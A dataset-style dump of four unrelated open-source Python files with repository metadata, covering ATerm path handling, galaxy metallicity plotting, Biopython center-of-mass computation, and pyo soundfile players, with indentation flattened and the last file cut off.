otherit = iter(other.indices)
for selfelm in iter(self.indices):
try:
otherelm = otherit.next()
except StopIteration:
return ANCESTOR
if otherelm < selfelm:
return PRECEDENT
if otherelm > selfelm:
return SUBSEQUENT
try:
otherit.next()
except StopIteration:
pass
else:
return DESCENDENT
return EQUAL
def equals(self, other):
return self.compare(other) == EQUAL
__eq__ = equals
def contains(self, other):
return self.compare(other) in (DESCENDENT, EQUAL)
def contained(self, other):
return self.compare(other) in (ANCESTOR, EQUAL)
def contains_range(self, start, end):
return self.contains(start) and self.contains(self, end)
def contained_in_range(self, start, end):
return (
self.compare(start) in (ANCESTOR, EQUAL, PRECEDENT) and
self.compare(end) in (ANCESTOR, EQUAL, SUBSEQUENT)
)
def ancestor(self, other):
'''Find the common ancestor of two paths.'''
res = []
for i1, i2 in zip(self.indices, other.indices):
if i1 != i2:
break
res.append(i1)
return Path(res)
def project(self, term):
'''Projects the subterm specified by a path.'''
for index in self.indices:
term = project.subterm(term, index)
return term
def transform(self, term, func):
func = func
for index in reversed(self.indices):
func = _Transformer(index, func)
term = func(term)
return term
def fromTerm(cls, trm):
res = []
tail = trm
while not types.isNil(tail):
if not types.isCons(tail):
raise ValueError('bad path', trm)
idx = tail.head
if not types.isInt(idx):
raise ValueError('bad index', idx)
res.append(idx.value)
tail = tail.tail
res.reverse()
return cls(res)
fromTerm = classmethod(fromTerm)
def toTerm(self):
res = factory.makeNil()
for index in self.indices:
res = factory.makeCons(factory.makeInt(index), res)
return res
def fromStr(cls, s):
res = [int(x) for x in s.split('/') if x != '']
return cls(res)
fromStr = classmethod(fromStr)
def toStr(self):
return '/' + ''.join([str(elm) + '/' for elm in self.indices])
__str__ = toStr
class _Annotator(visitor.Visitor):
def __init__(self, func = None):
visitor.Visitor.__init__(self)
if func is None:
self.func = lambda term: True
else:
self.func = func
def visitTerm(self, term, path):
return term
def visitCons(self, term, path):
return term.factory.makeList(
[self.visit(elm, term.factory.makeCons(term.factory.makeInt(index), path))
for index, elm in itertools.izip(itertools.count(), term)]
)
def visitAppl(self, term, path):
term = term.factory.makeAppl(
term.name,
[self.visit(arg, term.factory.makeCons(term.factory.makeInt(index), path))
for index, arg in itertools.izip(itertools.count(), term.args)],
term.annotations,
)
if self.func(term):
return annotation.set(term, term.factory.makeAppl('Path', [path]))
else:
return term
def annotate(term, root = None, func = None):
'''Recursively annotates the terms and all subterms with their
path.'''
annotator = _Annotator(func)
if root is None:
root = term.factory.makeNil()
return annotator.visit(term, root)
class _DeAnnotator(_Annotator):
def visitAppl(self, term, path):
return annotation.remove(term, 'Path')
def deannotate(term):
'''Recursively removes all path annotations.'''
annotator = _DeAnnotator()
root = term.factory.makeNil()
return annotator.visit(term, root)
|
mewbak/idc
|
aterm/path.py
|
Python
|
lgpl-2.1
| 5,156
|
[
"VisIt"
] |
fa11ac82113aebe50bd1ad7a3ef6080c9269ff23156394bcc347aded7d3be6aa
|
from lib_spm import *
#out_dir = os.path.join('/data42s/comparat/firefly/v1_1_0/figures', 'mass-redshift-presentation')
out_dir = os.path.join(os.environ['HOME'], 'wwwDir', 'firefly')
m_bins = n.arange(-3., 3., 0.01)
p.figure(2, (6.5, 3.5))
p.axes([0.12,0.18,0.8,0.73])
print('eboss')
for imf in imfs:
stellar_mass = imf+'stellar_mass'
age = imf+'metallicity_lightW'
redshift_reliable_boss = (boss['CLASS_NOQSO'] == "GALAXY") & ( boss['Z_ERR_NOQSO'] > 0.0) & (boss['ZWARNING_NOQSO'] == 0) & (boss['Z_NOQSO']>0.001) & (boss['Z_NOQSO'] > boss['Z_ERR_NOQSO'] ) # (boss['SN_MEDIAN_ALL'] > 0.1 ) &
error_reliable_boss = (boss[stellar_mass+'_up_1sig'] > boss[stellar_mass+'_low_1sig'] ) & (boss[stellar_mass+'_up_1sig'] > 0. ) & ( boss[stellar_mass+'_low_1sig'] > 0. ) & (boss[stellar_mass+'_up_1sig'] < 1e14 ) & ( boss[stellar_mass+'_low_1sig'] < 1e14 )
mass_reliable_boss_02 = (boss[stellar_mass] > 1e6 ) & ( boss[stellar_mass] < 1e14 ) & ((n.log10(boss[stellar_mass+'_up_1sig']) - n.log10(boss[stellar_mass+'_low_1sig']))/2. < 0.2 )
mass_reliable_boss_04 = (boss[stellar_mass] > 1e6 ) & ( boss[stellar_mass] < 1e14 ) & ((n.log10(boss[stellar_mass+'_up_1sig']) - n.log10(boss[stellar_mass+'_low_1sig']))/2. < 0.4)
ok_boss_02 = (error_reliable_boss) & (mass_reliable_boss_02) & (redshift_reliable_boss)
ok_boss_04 = (error_reliable_boss) & (mass_reliable_boss_04) & (redshift_reliable_boss)
#Ms_02_boss = n.log10(boss[stellar_mass][ok_boss_02])
Ms_04_boss = n.log10(boss[age][ok_boss_04])
p.hist(Ms_04_boss, bins = m_bins, histtype='step', label=imf[:-1], cumulative=True, normed=True )
p.ylabel(r"N(dlogZ=0.02)")
p.xlabel(r'$\log_{10}(Z/Z_\odot)$')
#p.yscale('log')
p.title('eBOSS')
p.legend(loc=2, frameon = False, fontsize=11)
p.xlim((-2.5,0.5))
p.grid()
p.savefig(os.path.join(out_dir, "metallicity_lightW_distribution_eboss.png" ))
p.clf()
print('sdss')
p.figure(2, (6.5, 3.5))
p.axes([0.12,0.18,0.8,0.73])
for imf in imfs:
stellar_mass = imf+'stellar_mass'
age = imf+'metallicity_lightW'
redshift_reliable_sdss = (sdss['CLASS'] == "GALAXY") & ( sdss['Z_ERR'] > 0.0) & (sdss['ZWARNING'] == 0) & (sdss['Z'] > 0.001) & (sdss['Z'] > sdss['Z_ERR'] ) # (sdss['SN_MEDIAN_ALL'] > 0.1 ) &
error_reliable_sdss = (sdss[stellar_mass+'_up_1sig'] > sdss[stellar_mass+'_low_1sig'] ) & (sdss[stellar_mass+'_up_1sig'] > 0. ) & ( sdss[stellar_mass+'_low_1sig'] > 0. ) & (sdss[stellar_mass+'_up_1sig'] < 1e14 ) & ( sdss[stellar_mass+'_low_1sig'] < 1e14 )
mass_reliable_sdss_02 = (sdss[stellar_mass] > 1e6 ) & ( sdss[stellar_mass] < 1e14 ) & ((n.log10(sdss[stellar_mass+'_up_1sig']) - n.log10(sdss[stellar_mass+'_low_1sig']))/2. < 0.2 )
mass_reliable_sdss_04 = (sdss[stellar_mass] > 1e6 ) & ( sdss[stellar_mass] < 1e14 ) & ((n.log10(sdss[stellar_mass+'_up_1sig']) - n.log10(sdss[stellar_mass+'_low_1sig']))/2. < 0.4 )
ok_sdss_02 = (error_reliable_sdss) & (mass_reliable_sdss_02) & (redshift_reliable_sdss)
ok_sdss_04 = (error_reliable_sdss) & (mass_reliable_sdss_04) & (redshift_reliable_sdss)
#Ms_02_sdss = n.log10(sdss[stellar_mass][ok_sdss_02])
Ms_04_sdss = n.log10(sdss[age][ok_sdss_04])
p.hist(Ms_04_sdss, bins = m_bins, histtype='step', label=imf[:-1] , cumulative=True, normed=True )
p.ylabel(r"N(dlogZ=0.02)")
p.xlabel(r'$\log_{10}(Z/Z_\odot)$')
#p.yscale('log')
p.title('SDSS')
p.legend(loc=2, frameon = False, fontsize=11)
p.xlim((-2.5,0.5))
p.grid()
p.savefig(os.path.join(out_dir, "metallicity_lightW_distribution_sdss.png" ))
p.clf()
print('deep2')
p.figure(2, (6.5, 3.5))
p.axes([0.12,0.18,0.8,0.73])
for imf in imfs:
stellar_mass = imf+'stellar_mass'
age = imf+'metallicity_lightW'
z_flg = 'ZQUALITY'
z_name = 'ZBEST'
deep2_zOk = (deep2[z_name] > 0.001) & (deep2[z_flg]>=2.) & (deep2[z_name] < 1.7) & (deep2['SSR']>0) & (deep2['TSR']>0) & (deep2['SSR']<=1.0001) & (deep2['TSR']<=1.0001)
deep2_sel_02 = (deep2_zOk) & (deep2[stellar_mass] < 10**14. ) & (deep2[stellar_mass] > 0. ) & (deep2[stellar_mass] >= deep2[stellar_mass+'_low_1sig'] ) & (deep2[stellar_mass] <= deep2[stellar_mass+'_up_1sig'] ) & ( - n.log10(deep2[stellar_mass+'_low_1sig']) + n.log10(deep2[stellar_mass+'_up_1sig']) < 0.4 )
deep2_sel_04 = (deep2_zOk) & (deep2[stellar_mass] < 10**14. ) & (deep2[stellar_mass] > 0. ) & (deep2[stellar_mass] >= deep2[stellar_mass+'_low_1sig'] ) & (deep2[stellar_mass] <= deep2[stellar_mass+'_up_1sig'] ) & ( - n.log10(deep2[stellar_mass+'_low_1sig']) + n.log10(deep2[stellar_mass+'_up_1sig']) < 0.8 )
Ms_02_d2 = n.log10(deep2[age][deep2_sel_02])
Ms_04_d2 = n.log10(deep2[age][deep2_sel_04])
w_deep2 = 1. / (deep2['TSR'] * deep2['SSR'])
p.hist(Ms_04_d2, bins = m_bins, histtype='step', label=imf[:-1] , cumulative=True, normed=True )
p.ylabel('normed cumulative distribution')
p.xlabel(r'$\log_{10}(Z/Z_\odot)$')
#p.yscale('log')
p.title('DEEP2')
p.legend(loc=2, frameon = False, fontsize=11)
p.xlim((-2.5,0.5))
p.grid()
p.savefig(os.path.join(out_dir, "metallicity_lightW_distribution_deep2.png" ))
p.clf()
###############################################################
###############################################################
###############################################################
###############################################################
###############################################################
###############################################################
p.figure(2, (6.5, 3.5))
p.axes([0.12,0.18,0.8,0.73])
print('eboss')
for imf in imfs:
stellar_mass = imf+'stellar_mass'
age = imf+'metallicity_massW'
redshift_reliable_boss = (boss['CLASS_NOQSO'] == "GALAXY") & ( boss['Z_ERR_NOQSO'] > 0.0) & (boss['ZWARNING_NOQSO'] == 0) & (boss['Z_NOQSO']>0.001) & (boss['Z_NOQSO'] > boss['Z_ERR_NOQSO'] ) # (boss['SN_MEDIAN_ALL'] > 0.1 ) &
error_reliable_boss = (boss[stellar_mass+'_up_1sig'] > boss[stellar_mass+'_low_1sig'] ) & (boss[stellar_mass+'_up_1sig'] > 0. ) & ( boss[stellar_mass+'_low_1sig'] > 0. ) & (boss[stellar_mass+'_up_1sig'] < 1e14 ) & ( boss[stellar_mass+'_low_1sig'] < 1e14 )
mass_reliable_boss_02 = (boss[stellar_mass] > 1e6 ) & ( boss[stellar_mass] < 1e14 ) & ((n.log10(boss[stellar_mass+'_up_1sig']) - n.log10(boss[stellar_mass+'_low_1sig']))/2. < 0.2 )
mass_reliable_boss_04 = (boss[stellar_mass] > 1e6 ) & ( boss[stellar_mass] < 1e14 ) & ((n.log10(boss[stellar_mass+'_up_1sig']) - n.log10(boss[stellar_mass+'_low_1sig']))/2. < 0.4)
ok_boss_02 = (error_reliable_boss) & (mass_reliable_boss_02) & (redshift_reliable_boss)
ok_boss_04 = (error_reliable_boss) & (mass_reliable_boss_04) & (redshift_reliable_boss)
#Ms_02_boss = n.log10(boss[stellar_mass][ok_boss_02])
Ms_04_boss = n.log10(boss[age][ok_boss_04])
p.hist(Ms_04_boss, bins = m_bins, histtype='step', label=imf[:-1], cumulative=True, normed=True )
p.ylabel('normed cumulative distribution')
p.xlabel(r'$\log_{10}(Z/Z_\odot)$')
#p.yscale('log')
p.title('eBOSS')
p.legend(loc=2, frameon = False, fontsize=11)
p.xlim((-2.5,0.5))
p.grid()
p.savefig(os.path.join(out_dir, "metallicity_massW_distribution_eboss.png" ))
p.clf()
print('sdss')
p.figure(2, (6.5, 3.5))
p.axes([0.12,0.18,0.8,0.73])
for imf in imfs:
stellar_mass = imf+'stellar_mass'
age = imf+'metallicity_massW'
redshift_reliable_sdss = (sdss['CLASS'] == "GALAXY") & ( sdss['Z_ERR'] > 0.0) & (sdss['ZWARNING'] == 0) & (sdss['Z'] > 0.001) & (sdss['Z'] > sdss['Z_ERR'] ) # (sdss['SN_MEDIAN_ALL'] > 0.1 ) &
error_reliable_sdss = (sdss[stellar_mass+'_up_1sig'] > sdss[stellar_mass+'_low_1sig'] ) & (sdss[stellar_mass+'_up_1sig'] > 0. ) & ( sdss[stellar_mass+'_low_1sig'] > 0. ) & (sdss[stellar_mass+'_up_1sig'] < 1e14 ) & ( sdss[stellar_mass+'_low_1sig'] < 1e14 )
mass_reliable_sdss_02 = (sdss[stellar_mass] > 1e6 ) & ( sdss[stellar_mass] < 1e14 ) & ((n.log10(sdss[stellar_mass+'_up_1sig']) - n.log10(sdss[stellar_mass+'_low_1sig']))/2. < 0.2 )
mass_reliable_sdss_04 = (sdss[stellar_mass] > 1e6 ) & ( sdss[stellar_mass] < 1e14 ) & ((n.log10(sdss[stellar_mass+'_up_1sig']) - n.log10(sdss[stellar_mass+'_low_1sig']))/2. < 0.4 )
ok_sdss_02 = (error_reliable_sdss) & (mass_reliable_sdss_02) & (redshift_reliable_sdss)
ok_sdss_04 = (error_reliable_sdss) & (mass_reliable_sdss_04) & (redshift_reliable_sdss)
#Ms_02_sdss = n.log10(sdss[stellar_mass][ok_sdss_02])
Ms_04_sdss = n.log10(sdss[age][ok_sdss_04])
p.hist(Ms_04_sdss, bins = m_bins, histtype='step', label=imf[:-1], cumulative=True, normed=True )
p.ylabel('normed cumulative distribution')
p.xlabel(r'$\log_{10}(Z/Z_\odot)$')
#p.yscale('log')
p.title('SDSS')
p.legend(loc=2, frameon = False, fontsize=11)
p.xlim((-2.5,0.5))
p.grid()
p.savefig(os.path.join(out_dir, "metallicity_massW_distribution_sdss.png" ))
p.clf()
print('deep2')
p.figure(2, (6.5, 3.5))
p.axes([0.12,0.18,0.8,0.73])
for imf in imfs:
stellar_mass = imf+'stellar_mass'
age = imf+'metallicity_massW'
z_flg = 'ZQUALITY'
z_name = 'ZBEST'
deep2_zOk = (deep2[z_name] > 0.001) & (deep2[z_flg]>=2.) & (deep2[z_name] < 1.7) & (deep2['SSR']>0) & (deep2['TSR']>0) & (deep2['SSR']<=1.0001) & (deep2['TSR']<=1.0001)
deep2_sel_02 = (deep2_zOk) & (deep2[stellar_mass] < 10**14. ) & (deep2[stellar_mass] > 0. ) & (deep2[stellar_mass] >= deep2[stellar_mass+'_low_1sig'] ) & (deep2[stellar_mass] <= deep2[stellar_mass+'_up_1sig'] ) & ( - n.log10(deep2[stellar_mass+'_low_1sig']) + n.log10(deep2[stellar_mass+'_up_1sig']) < 0.4 )
deep2_sel_04 = (deep2_zOk) & (deep2[stellar_mass] < 10**14. ) & (deep2[stellar_mass] > 0. ) & (deep2[stellar_mass] >= deep2[stellar_mass+'_low_1sig'] ) & (deep2[stellar_mass] <= deep2[stellar_mass+'_up_1sig'] ) & ( - n.log10(deep2[stellar_mass+'_low_1sig']) + n.log10(deep2[stellar_mass+'_up_1sig']) < 0.8 )
Ms_02_d2 = n.log10(deep2[age][deep2_sel_02])
Ms_04_d2 = n.log10(deep2[age][deep2_sel_04])
w_deep2 = 1. / (deep2['TSR'] * deep2['SSR'])
p.hist(Ms_04_d2, bins = m_bins, histtype='step', label=imf[:-1], cumulative=True, normed=True )
p.ylabel('normed cumulative distribution')
p.xlabel(r'$\log_{10}(Z/Z_\odot)$')
#p.yscale('log')
p.title('DEEP2')
p.legend(loc=2, frameon = False, fontsize=11)
p.xlim((-2.5,0.5))
p.grid()
p.savefig(os.path.join(out_dir, "metallicity_massW_distribution_deep2.png" ))
p.clf()
|
JohanComparat/pySU
|
spm/bin_SMF/plot_distribution_metals.py
|
Python
|
cc0-1.0
| 10,258
|
[
"Firefly",
"Galaxy"
] |
fee2da742f36c00f95dbadea0f38b19e4c14e1237cae8478b2b9460bfa3dbea5
|
# Copyright (C) 2010, Joao Rodrigues (anaryin@gmail.com)
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""
Module with assorted geometrical functions on
macromolecules.
"""
from Bio.PDB import Entity
import numpy as np
def center_of_mass(entity, geometric=False):
"""
Returns gravitic [default] or geometric center of mass of an Entity.
Geometric assumes all masses are equal (geometric=True)
"""
# Structure, Model, Chain, Residue
if isinstance(entity, Entity.Entity):
atom_list = entity.get_atoms()
# List of Residues, added 2018-03-17 by Nathan
elif hasattr(entity, '__iter__') and [x for x in entity if x.level == 'R']:
atom_list = []
for res in entity:
atom_list.extend(list(res.get_atoms()))
# List of Atoms
elif hasattr(entity, '__iter__') and [x for x in entity if x.level == 'A']:
atom_list = entity
else: # Some other weirdo object
raise ValueError("Center of Mass can only be calculated from the following objects:\n"
"Structure, Model, Chain, Residue, list of Atoms.")
masses = []
positions = [ [], [], [] ] # [ [X1, X2, ..] , [Y1, Y2, ...] , [Z1, Z2, ...] ]
for atom in atom_list:
masses.append(atom.mass)
for i, coord in enumerate(np.array(atom.coord).tolist()):
positions[i].append(coord)
# If there is a single atom with undefined mass complain loudly.
if 'ukn' in set(masses) and not geometric:
raise ValueError("Some Atoms don't have an element assigned.\n"
"Try adding them manually or calculate the geometrical center of mass instead.")
if geometric:
return [sum(coord_list)/len(masses) for coord_list in positions]
else:
w_pos = [ [], [], [] ]
for atom_index, atom_mass in enumerate(masses):
w_pos[0].append(positions[0][atom_index]*atom_mass)
w_pos[1].append(positions[1][atom_index]*atom_mass)
w_pos[2].append(positions[2][atom_index]*atom_mass)
return [sum(coord_list)/sum(masses) for coord_list in w_pos]
|
SBRG/ssbio
|
ssbio/biopython/Bio/Struct/Geometry.py
|
Python
|
mit
| 2,274
|
[
"Biopython"
] |
6ed0786b6de3a60a208701d3e555475c1989808bfa98a21851d6dca19467f14b
|
"""
Play soundfiles from the disk.
SfMarkerXXX objects use markers features (store in the header) from
an AIFF file to create more specific reading patterns.
"""
"""
Copyright 2009-2015 Olivier Belanger
This file is part of pyo, a python module to help digital signal
processing script creation.
pyo is free software: you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
pyo is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with pyo. If not, see <http://www.gnu.org/licenses/>.
"""
from ._core import *
from ._maps import *
import aifc
class SfPlayer(PyoObject):
"""
Soundfile player.
Reads audio data from a file using one of several available interpolation
types. User can alter its pitch with the `speed` attribute. The object
takes care of sampling rate conversion to match the Server sampling
rate setting.
:Parent: :py:class:`PyoObject`
:Args:
path: string
Full path name of the sound to read.
speed: float or PyoObject, optional
Transpose the pitch of input sound by this factor.
Defaults to 1.
1 is the original pitch, lower values play sound slower, and higher
values play sound faster.
Negative values results in playing sound backward.
Although the `speed` attribute accepts audio
rate signal, its value is updated only once per buffer size.
loop: bool, optional
If set to True, sound will play in loop. Defaults to False.
offset: float, optional
Time in seconds of input sound to be skipped, assuming speed = 1.
If the object is already playing (and play() is implicitly called at
the object creation), this value will be effective only on the next
loop point. Defaults to 0.
interp: int, optional
Interpolation type. Defaults to 2.
1. no interpolation
2. linear
3. cosinus
4. cubic
.. note::
SfPlayer will send a trigger signal at the end of the playback if
loop is off or any time it wraps around if loop is on. User can
retrieve the trigger streams by calling obj['trig']:
>>> sf = SfPlayer(SNDS_PATH + "/transparent.aif").out()
>>> trig = TrigRand(sf['trig'])
Note that the object will send as many trigs as there is channels
in the sound file. If you want to retrieve only one trig, only give
the first stream to the next object:
>>> def printing():
... print("one trig!")
>>> sf = SfPlayer("/stereo/sound/file.aif").out()
>>> trig = TrigFunc(sf['trig'][0], printing)
>>> s = Server().boot()
>>> s.start()
>>> snd = SNDS_PATH + "/transparent.aif"
>>> sf = SfPlayer(snd, speed=[.75,.8], loop=True, mul=.3).out()
"""
def __init__(self, path, speed=1, loop=False, offset=0, interp=2, mul=1, add=0):
pyoArgsAssert(self, "sObniOO", path, speed, loop, offset, interp, mul, add)
PyoObject.__init__(self, mul, add)
self._path = path
self._speed = speed
self._loop = loop
self._offset = offset
self._interp = interp
path, speed, loop, offset, interp, mul, add, lmax = convertArgsToLists(
path, speed, loop, offset, interp, mul, add
)
self._base_players = []
self._base_objs = []
_trig_objs_tmp = []
for i in range(lmax):
_snd_size, _dur, _snd_sr, _snd_chnls, _format, _type = sndinfo(path[0])
self._base_players.append(
SfPlayer_base(
stringencode(wrap(path, i)), wrap(speed, i), wrap(loop, i), wrap(offset, i), wrap(interp, i)
)
)
for j in range(_snd_chnls):
self._base_objs.append(SfPlay_base(self._base_players[-1], j, wrap(mul, i), wrap(add, i)))
_trig_objs_tmp.append(TriggerDummy_base(self._base_players[-1]))
self._trig_objs = Dummy(_trig_objs_tmp)
self._init_play()
def setPath(self, path):
"""
Sets a new sound to read.
The number of channels of the new sound must match those
of the sound loaded at initialization time.
:Args:
path: string
Full path of the new sound.
"""
pyoArgsAssert(self, "s", path)
if type(self._path) == list:
curNchnls = sndinfo(self._path[0])[3]
else:
curNchnls = sndinfo(self._path)[3]
if type(path) == list:
p = path[0]
else:
p = path
try:
_snd_size, _dur, _snd_sr, _snd_chnls, _format, _type = sndinfo(p)
except:
return
if _snd_chnls != curNchnls:
print("Soundfile must contains exactly %d channels." % curNchnls)
return
self._path = path
path, lmax = convertArgsToLists(path)
[obj.setSound(stringencode(wrap(path, i))) for i, obj in enumerate(self._base_players)]
def setSound(self, path):
"""
Sets a new sound to read.
The number of channels of the new sound must match those
of the sound loaded at initialization time.
:Args:
path: string
Full path of the new sound.
"""
self.setPath(path)
def setSpeed(self, x):
"""
Replace the `speed` attribute.
:Args:
x: float or PyoObject
new `speed` attribute.
"""
pyoArgsAssert(self, "O", x)
self._speed = x
x, lmax = convertArgsToLists(x)
[obj.setSpeed(wrap(x, i)) for i, obj in enumerate(self._base_players)]
def setLoop(self, x):
"""
Replace the `loop` attribute.
:Args:
x: bool {True, False}
new `loop` attribute.
"""
pyoArgsAssert(self, "b", x)
self._loop = x
x, lmax = convertArgsToLists(x)
for i, obj in enumerate(self._base_players):
if wrap(x, i):
obj.setLoop(1)
else:
obj.setLoop(0)
def setOffset(self, x):
"""
Replace the `offset` attribute.
:Args:
x: float
new `offset` attribute.
"""
pyoArgsAssert(self, "n", x)
self._offset = x
x, lmax = convertArgsToLists(x)
[obj.setOffset(wrap(x, i)) for i, obj in enumerate(self._base_players)]
def setInterp(self, x):
"""
Replace the `interp` attribute.
:Args:
x: int {1, 2, 3, 4}
new `interp` attribute.
"""
pyoArgsAssert(self, "i", x)
self._interp = x
x, lmax = convertArgsToLists(x)
[obj.setInterp(wrap(x, i)) for i, obj in enumerate(self._base_players)]
def ctrl(self, map_list=None, title=None, wxnoserver=False):
self._map_list = [
SLMap(-2.0, 2.0, "lin", "speed", self._speed),
SLMap(1, 4, "lin", "interp", self._interp, res="int", dataOnly=True),
SLMapMul(self._mul),
]
PyoObject.ctrl(self, map_list, title, wxnoserver)
@property
def path(self):
"""string. Full path of the sound."""
return self._path
@path.setter
def path(self, x):
self.setPath(x)
@property
def sound(self):
"""string. Alias to the `path` attribute."""
return self._path
@sound.setter
def sound(self, x):
self.setPath(x)
@property
def speed(self):
"""float or PyoObject. Transposition factor."""
return self._speed
@speed.setter
def speed(self, x):
self.setSpeed(x)
@property
def loop(self):
"""bool. Looping mode."""
return self._loop
@loop.setter
def loop(self, x):
self.setLoop(x)
@property
def offset(self):
"""float. Time, in seconds, of the first sample to read."""
return self._offset
@offset.setter
def offset(self, x):
self.setOffset(x)
@property
def interp(self):
"""int {1, 2, 3, 4}. Interpolation method."""
return self._interp
@interp.setter
def interp(self, x):
self.setInterp(x)
class SfMarkerShuffler(PyoObject):
"""
AIFF with markers soundfile shuffler.
Reads audio data from a AIFF file using one of several available
interpolation types. User can alter its pitch with the `speed`
attribute. The object takes care of sampling rate conversion to
match the Server sampling rate setting.
The reading pointer randomly choose a marker (from the MARK chunk
in the header of the AIFF file) as its starting point and reads
the samples until it reaches the following marker. Then, it choose
another marker and reads from the new position and so on...
:Parent: :py:class:`PyoObject`
:Args:
path: string
Full path name of the sound to read. Can't e changed after
initialization.
speed: float or PyoObject, optional
Transpose the pitch of input sound by this factor.
Defaults to 1.
1 is the original pitch, lower values play sound slower, and higher
values play sound faster.
Negative values results in playing sound backward.
Although the `speed` attribute accepts audio
rate signal, its value is updated only once per buffer size.
interp: int, optional
Choice of the interpolation method. Defaults to 2.
1. no interpolation
2. linear
3. cosinus
4. cubic
>>> s = Server().boot()
>>> s.start()
>>> sound = SNDS_PATH + "/transparent.aif"
>>> sf = SfMarkerShuffler(sound, speed=[1,1], mul=.3).out()
>>> sf.setRandomType("expon_min", 0.6)
"""
def __init__(self, path, speed=1, interp=2, mul=1, add=0):
pyoArgsAssert(self, "sOiOO", path, speed, interp, mul, add)
PyoObject.__init__(self, mul, add)
self._speed = speed
self._interp = interp
path, speed, interp, mul, add, lmax = convertArgsToLists(path, speed, interp, mul, add)
self._base_players = []
self._base_objs = []
self._snd_size, self._dur, self._snd_sr, self._snd_chnls, _format, _type = sndinfo(path[0])
for i in range(lmax):
try:
sf = aifc.open(wrap(path, i)) # Do we need stringencode() here?
markerstmp = sf.getmarkers()
sf.close()
self._markers = [m[1] for m in markerstmp]
except:
self._markers = []
self._base_players.append(
SfMarkerShuffler_base(stringencode(wrap(path, i)), self._markers, wrap(speed, i), wrap(interp, i))
)
for i in range(lmax * self._snd_chnls):
j = i // self._snd_chnls
self._base_objs.append(
SfMarkerShuffle_base(wrap(self._base_players, j), i % self._snd_chnls, wrap(mul, j), wrap(add, j))
)
self._init_play()
def setSpeed(self, x):
"""
Replace the `speed` attribute.
:Args:
x: float or PyoObject
new `speed` attribute.
"""
pyoArgsAssert(self, "O", x)
self._speed = x
x, lmax = convertArgsToLists(x)
[obj.setSpeed(wrap(x, i)) for i, obj in enumerate(self._base_players)]
def setInterp(self, x):
"""
Replace the `interp` attribute.
:Args:
x: int {1, 2, 3, 4}
new `interp` attribute.
"""
pyoArgsAssert(self, "i", x)
self._interp = x
x, lmax = convertArgsToLists(x)
[obj.setInterp(wrap(x, i)) for i, obj in enumerate(self._base_players)]
def setRandomType(self, dist=0, x=0.5):
"""
Set the random distribution type used to choose the markers.
:Args:
dist: int or string
The distribution type. Available distributions are:
0. uniform (default)
1. linear minimum
2. linear maximum
3. triangular
4. exponential minimum
5. exponential maximum
6. double (bi)exponential
7. cauchy
8. weibull
9. gaussian
x: float
Distribution specific parameter, if applicable, as a float
between 0 and 1. Defaults to 0.5.
.. note::
Depending on the distribution type, `x` parameter is applied as
follow (names as string, or associated number can be used as `dist`
parameter):
0. uniform
- x: not used
1. linear_min
- x: not used
2. linear_max
- x: not used
3. triangle
- x: not used
4. expon_min
- x: slope {0 = no slope -> 1 = sharp slope}
5. expon_max
- x: slope {0 = no slope -> 1 = sharp slope}
6. biexpon
- x: bandwidth {0 = huge bandwidth -> 1 = narrow bandwidth}
7. cauchy
- x: bandwidth {0 = huge bandwidth -> 1 = narroe bandwidth}
8. weibull
- x: shape {0 = expon min => linear min => 1 = gaussian}
9. gaussian
- x: bandwidth {0 = huge bandwidth -> 1 = narrow bandwidth}
"""
dist, x, lmax = convertArgsToLists(dist, x)
for i, t in enumerate(dist):
if type(t) in [bytes, str]:
dist[i] = XNOISE_DICT.get(t, 0)
[obj.setRandomType(wrap(dist, i), wrap(x, i)) for i, obj in enumerate(self._base_players)]
def getMarkers(self):
"""
Returns a list of marker time values in samples.
"""
return self._markers
def ctrl(self, map_list=None, title=None, wxnoserver=False):
self._map_list = [
SLMap(0.01, 2.0, "lin", "speed", self._speed),
SLMap(1, 4, "lin", "interp", self._interp, res="int", dataOnly=True),
SLMapMul(self._mul),
]
PyoObject.ctrl(self, map_list, title, wxnoserver)
@property
def speed(self):
"""float or PyoObject. Transposition factor."""
return self._speed
@speed.setter
def speed(self, x):
self.setSpeed(x)
@property
def interp(self):
"""int {1, 2, 3, 4}. Interpolation method."""
return self._interp
@interp.setter
def interp(self, x):
self.setInterp(x)
class SfMarkerLooper(PyoObject):
"""
AIFF with markers soundfile looper.
Reads audio data from a AIFF file using one of several available
interpolation types. User can alter its pitch with the `speed`
attribute. The object takes care of sampling rate conversion to
match the Server sampling rate setting.
The reading pointer loops a specific marker (from the MARK chunk
in the header of the AIFF file) until it received a new integer
in the `mark` attribute.
:Parent: :py:class:`PyoObject`
:Args:
path: string
Full path name of the sound to read.
speed: float or PyoObject, optional
Transpose the pitch of input sound by this factor.
Defaults to 1.
1 is the original pitch, lower values play sound slower, and higher
values play sound faster.
Negative values results in playing sound backward.
Although the `speed` attribute accepts audio
rate signal, its value is updated only once per buffer size.
mark: float or PyoObject, optional
Integer denoting the marker to loop, in the range
0 -> len(getMarkers()). Defaults to 0.
interp: int, optional
Choice of the interpolation method. Defaults to 2.
1. no interpolation
2. linear
3. cosinus
4. cubic
>>> s = Server().boot()
>>> s.start()
>>> a = SfMarkerLooper(SNDS_PATH + '/transparent.aif', speed=[.999,1], mul=.3).out()
>>> rnd = RandInt(len(a.getMarkers()), 2)
>>> a.mark = rnd
"""
def __init__(self, path, speed=1, mark=0, interp=2, mul=1, add=0):
pyoArgsAssert(self, "sOOiOO", path, speed, mark, interp, mul, add)
PyoObject.__init__(self, mul, add)
self._speed = speed
self._mark = mark
self._interp = interp
path, speed, mark, interp, mul, add, lmax = convertArgsToLists(path, speed, mark, interp, mul, add)
self._base_players = []
self._base_objs = []
self._snd_size, self._dur, self._snd_sr, self._snd_chnls, _format, _type = sndinfo(path[0])
for i in range(lmax):
try:
sf = aifc.open(wrap(path, i))
markerstmp = sf.getmarkers()
sf.close()
self._markers = [m[1] for m in markerstmp]
except:
self._markers = []
self._base_players.append(
SfMarkerLooper_base(
stringencode(wrap(path, i)), self._markers, wrap(speed, i), wrap(mark, i), wrap(interp, i)
)
)
for i in range(lmax * self._snd_chnls):
j = i // self._snd_chnls
self._base_objs.append(
SfMarkerLoop_base(wrap(self._base_players, j), i % self._snd_chnls, wrap(mul, j), wrap(add, j))
)
self._init_play()
def setSpeed(self, x):
"""
Replace the `speed` attribute.
:Args:
